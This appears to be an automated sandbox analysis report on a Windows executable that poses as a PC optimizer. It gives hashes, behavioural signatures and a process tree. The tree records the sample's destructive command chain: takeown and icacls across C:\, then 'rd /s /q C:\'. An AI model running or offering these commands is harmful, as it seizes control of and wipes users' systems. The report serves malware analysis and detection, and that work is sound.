Analysis

  • max time kernel
    120s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-12-2024 15:40

General

  • Target

    d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe

  • Size

    97KB

  • MD5

    35d32ac777d694188d6bd2a89e541250

  • SHA1

    6ee4cebbfc71483cd19e6dd01eceaa583cf976a1

  • SHA256

    d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97

  • SHA512

    4e2ac2282653247db5ab6983292b7fb529a86286ca868cef6b2ceb70450ec870a266eb8c21467a4eb04035fd0fc71ce5ffb36d2d0986233bdb1e6c2471ae5702

  • SSDEEP

    3072:MwavFbFSymUJlum6XhJTeiWswHQVcScs7e3/0o:MnvFbFfV7udxteiWpQVcEe3M

Malware Config

Signatures

  • Drops file in Drivers directory 64 IoCs
  • Manipulates Digital Signatures 4 IoCs

    Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

  • Possible privilege escalation attempt 2 IoCs
  • Boot or Logon Autostart Execution: Print Processors 1 TTPs 1 IoCs

    Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 4 IoCs
  • Drops autorun.inf file 1 TTPs 1 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 64 IoCs
  • Modifies termsrv.dll 1 TTPs 1 IoCs

    Commonly used to allow simultaneous RDP sessions.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe
    "C:\Users\Admin\AppData\Local\Temp\d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3868
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c chcp 65001 && cls && title PC FUCKER OPTIMIZER && color 0B && mode 145,30
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:1144
        • C:\Windows\system32\mode.com
          mode 145,30
          3⤵
            PID:2520
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c start /B takeown /f C:\ /r /d y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1464
          • C:\Windows\system32\takeown.exe
            takeown /f C:\ /r /d y
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:3216
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c start /B icacls C:\ /grant administrators:F /t
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3284
          • C:\Windows\system32\icacls.exe
            icacls C:\ /grant administrators:F /t
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1764
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c start /B cmd /c rd /s /q C:\
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4252
          • C:\Windows\system32\cmd.exe
            cmd /c rd /s /q C:\
            3⤵
            • Drops file in Drivers directory
            • Manipulates Digital Signatures
            • Boot or Logon Autostart Execution: Print Processors
            • Drops desktop.ini file(s)
            • Drops autorun.inf file
            • Drops file in System32 directory
            • Modifies termsrv.dll
            • Drops file in Program Files directory
            • Drops file in Windows directory
            PID:3412
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy
        1⤵
          PID:1712
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k UnistackSvcGroup
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:552
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
          1⤵
            PID:4056
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Enumerates system info in registry
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            PID:4764
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
            1⤵
              PID:4036
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy
              1⤵
                PID:1756
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
                1⤵
                  PID:4652
                • C:\Windows\system32\rundll32.exe
                  "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
                  1⤵
                    PID:4724

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\C8NS4PKY\microsoft.windows[1].xml

                    Filesize

                    97B

                    MD5

                    3209f92b6f79d54b202c24e3dcbfd340

                    SHA1

                    55ffcaee24991ac620833d887684a4c75242435e

                    SHA256

                    d564ceba58a3b04624a0fa3fadc27acbec5787f605e93111ec53ffdb7e0baf45

                    SHA512

                    f097d2fc91bf8a4d25a4addec6a06ff4dfcfc32700e60338290fa45ef0abc4de8f827a843c8c8d7dd90df777ad632010f48b29a4e71d7329f1a0a9955ccc54ad

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe

                    Filesize

                    36KB

                    MD5

                    bad093419be1135cfe9694ea77088c78

                    SHA1

                    76204c7ca72cf666add9c9931389d635c82e8af0

                    SHA256

                    136808af50ee73df9befd76f7aca21765782565b0095227c5a287f3be0b5ef3c

                    SHA512

                    3b5cb7f80d7cbc557b5a32a995cd607257ac8e56af935ce6f64c54ba1f311a65ef00c69c69047b6eb7bb678c2b1bc0a3c37548aef417ea49e414e1a34bcf651d

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\0.0.filtertrie.intermediate.txt

                    Filesize

                    28KB

                    MD5

                    ab6db363a3fc9e4af2864079fd88032d

                    SHA1

                    aa52099313fd6290cd6e57d37551d63cd96dbe45

                    SHA256

                    373bb433c2908af2e3de58ede2087642814564560d007e61748cdb48d4e9da3f

                    SHA512

                    d3d13d17df96705d0de119ad0f8380bfe6b7bc44c618e2fcd0233061a0ab15beae44d38c48a880121b35f90f56c1529e5f4cf1a19acb9e2cbba5d1c402c749c0

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\0.1.filtertrie.intermediate.txt

                    Filesize

                    5B

                    MD5

                    34bd1dfb9f72cf4f86e6df6da0a9e49a

                    SHA1

                    5f96d66f33c81c0b10df2128d3860e3cb7e89563

                    SHA256

                    8e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c

                    SHA512

                    e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\0.2.filtertrie.intermediate.txt

                    Filesize

                    5B

                    MD5

                    c204e9faaf8565ad333828beff2d786e

                    SHA1

                    7d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1

                    SHA256

                    d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f

                    SHA512

                    e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\Apps.ft

                    Filesize

                    38KB

                    MD5

                    84ac0c242b77b8fc326db0a5926b089e

                    SHA1

                    cc6b367ae8eb38561de01813b7d542067fb2318f

                    SHA256

                    b1557167a6df424f8b28aabd31d1b7e8a469dd50d2ae4cbbd43afd8f9c62cf92

                    SHA512

                    8f63084bd5a270b7b05e80454d26127b69bcb98ec93d9fad58d77203934f46b677a3aaf20f29e73dcd7035deb61f4c0aa3b10acbc4c0fc210632c1d74f705d2f

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\Apps.index

                    Filesize

                    1.0MB

                    MD5

                    f4514c93191e0efc0f61036e4ebb341a

                    SHA1

                    c80478e9a734790c18584f67a43518aa4a7dcf58

                    SHA256

                    43da4fa5f62affe399ceaac2d489b7cde610963a48e72d445bebe6f2c63a3600

                    SHA512

                    8aecb3491767e040a52f351908004db2c8f2f083397744585c2832212ec8aa288d3492be941a48b04774e16b43672ab167209776cbdef6692fef684fc54666a6

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\apps.csg

                    Filesize

                    444B

                    MD5

                    5475132f1c603298967f332dc9ffb864

                    SHA1

                    4749174f29f34c7d75979c25f31d79774a49ea46

                    SHA256

                    0b0af873ef116a51fc2a2329dc9102817ce923f32a989c7a6846b4329abd62cd

                    SHA512

                    54433a284a6b7185c5f2131928b636d6850babebc09acc5ee6a747832f9e37945a60a7192f857a2f6b4dd20433ca38f24b8e438ba1424cc5c73f0aa2d8c946ff

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\apps.schema

                    Filesize

                    150B

                    MD5

                    1659677c45c49a78f33551da43494005

                    SHA1

                    ae588ef3c9ea7839be032ab4323e04bc260d9387

                    SHA256

                    5af0fc2a0b5ccecdc04e54b3c60f28e3ff5c7d4e1809c6d7c8469f0567c090bb

                    SHA512

                    740a1b6fd80508f29f0f080a8daddec802aabed467d8c5394468b0cf79d7628c1cb5b93cf69ed785999e8d4e2b0f86776b428d4fa0d1afcdf3cbf305615e5030

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\appsconversions.txt

                    Filesize

                    1.4MB

                    MD5

                    2bef0e21ceb249ffb5f123c1e5bd0292

                    SHA1

                    86877a464a0739114e45242b9d427e368ebcc02c

                    SHA256

                    8b9fae5ea9dd21c2313022e151788b276d995c8b9115ee46832b804a914e6307

                    SHA512

                    f5b49f08b44a23f81198b6716195b868e76b2a23a388449356b73f8261107733f05baa027f8cdb8e469086a9869f4a64983c76da0dc978beb4ec1cb257532c6b

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\appsglobals.txt

                    Filesize

                    343KB

                    MD5

                    931b27b3ec2c5e9f29439fba87ec0dc9

                    SHA1

                    dd5e78f004c55bbebcd1d66786efc5ca4575c9b4

                    SHA256

                    541dfa71a3728424420f082023346365cca013af03629fd243b11d8762e3403e

                    SHA512

                    4ba517f09d9ad15efd3db5a79747e42db53885d3af7ccc425d52c711a72e15d24648f8a38bc7e001b3b4cc2180996c6cac3949771aa1c278ca3eb7542eae23fd

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\appssynonyms.txt

                    Filesize

                    237KB

                    MD5

                    06a69ad411292eca66697dc17898e653

                    SHA1

                    fbdcfa0e1761ddcc43a0fb280bbcd2743ba8820d

                    SHA256

                    2aa90f795a65f0e636154def7d84094af2e9a5f71b1b73f168a6ea23e74476d1

                    SHA512

                    ceb4b102309dffb65804e3a0d54b8627fd88920f555b334c3eac56b13eeb5075222d794c3cdbc3cda8bf1658325fdecf6495334e2c89b5133c9a967ec0d15693

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133775412632506468.txt

                    Filesize

                    73KB

                    MD5

                    4c036314f080c753345c8481caf9ae5f

                    SHA1

                    c90add2903b9de1bfac12a139e2551af8ec71745

                    SHA256

                    ca7a49706055df15b0d7f15795ca9846c18f76f20ce135c039f99096bf164b71

                    SHA512

                    2c42b710436c2153a935fdbee7399177deca03c9c877cff99ef2dfa237fc7da5cc0dfbd93129122b268f8eda79f34e41ea5f9c901e5dee35861a2c9dce09bc38

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

                    Filesize

                    264KB

                    MD5

                    1cfd4dfcfb7ff0db604853d410c7693f

                    SHA1

                    7e40d4593dc22157ab54c2bd91aa1de7b6b7a4d0

                    SHA256

                    e1da3f93231ecd911d800ae8bd4a81bf6c3443ea3cd3143a36ad96f3d4ab5d67

                    SHA512

                    db634f3057a665d89a8e9299617c9534ca4a3080c82fd60cbaf0a24e0d364480ac048d29376607427332334a9b819dd7c4f8325ec31340f7b544044f022faa89

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

                    Filesize

                    10KB

                    MD5

                    f3c9e170d9bfc6f2c39488c27eb58d01

                    SHA1

                    ff6ba2a9d0d6eaca53877f9b75fbc9525f8cf0c4

                    SHA256

                    76a58bfe1c97d51565d0d30e9be285d7d180e5563c132ed4d3be24a689f32976

                    SHA512

                    8c80705f90707b88fc7c13c334f44c909899755cf4157d7933bfdc0e859317cff1be56661d3ee6455e5ba5186debf1fda9115547015cdae9b3df2d34c81cbee6

                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

                    Filesize

                    10KB

                    MD5

                    3815fc4f8de2957b15bf53bd4adb67df

                    SHA1

                    f91af2aa83e4e0a4d95865d2ed90c4b39408fd88

                    SHA256

                    63719f42e2d08e280b70e4848dc1029260177d0d3df0dd89a4740555e92c981e

                    SHA512

                    14ed5a906442ac6283bb512a96daf4d5bbfa21c7804a9c25470f3068dd50a5c04c65ade117e96c898cf43bef9f39290f0d27fa5028399487418649fffee6b2ec

                  • memory/552-48-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-45-0x00000256E9DC0000-0x00000256E9DC1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-54-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-57-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-58-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-56-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-61-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-60-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-59-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-64-0x00000256E9DF0000-0x00000256E9DF1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-62-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-55-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-63-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-65-0x00000256E9DF0000-0x00000256E9DF1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-66-0x00000256EA100000-0x00000256EA101000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-68-0x00000256EB640000-0x00000256EB641000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-67-0x00000256EB640000-0x00000256EB641000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-3-0x00000256E1940000-0x00000256E1950000-memory.dmp

                    Filesize

                    64KB

                  • memory/552-19-0x00000256E1A40000-0x00000256E1A50000-memory.dmp

                    Filesize

                    64KB

                  • memory/552-53-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-51-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-50-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-49-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-38-0x00000256E9C70000-0x00000256E9C71000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-47-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-52-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-46-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-44-0x00000256E9DC0000-0x00000256E9DC1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-42-0x00000256E9DB0000-0x00000256E9DB1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-43-0x00000256E9DC0000-0x00000256E9DC1000-memory.dmp

                    Filesize

                    4KB

                  • memory/552-40-0x00000256E9DB0000-0x00000256E9DB1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3868-0-0x00007FF679F50000-0x00007FF679FAA000-memory.dmp

                    Filesize

                    360KB

                  • memory/3868-2-0x00007FF679F50000-0x00007FF679FAA000-memory.dmp

                    Filesize

                    360KB

                  • memory/4764-91-0x0000018CB8120000-0x0000018CB8140000-memory.dmp

                    Filesize

                    128KB

                  • memory/4764-77-0x0000018CB8160000-0x0000018CB8180000-memory.dmp

                    Filesize

                    128KB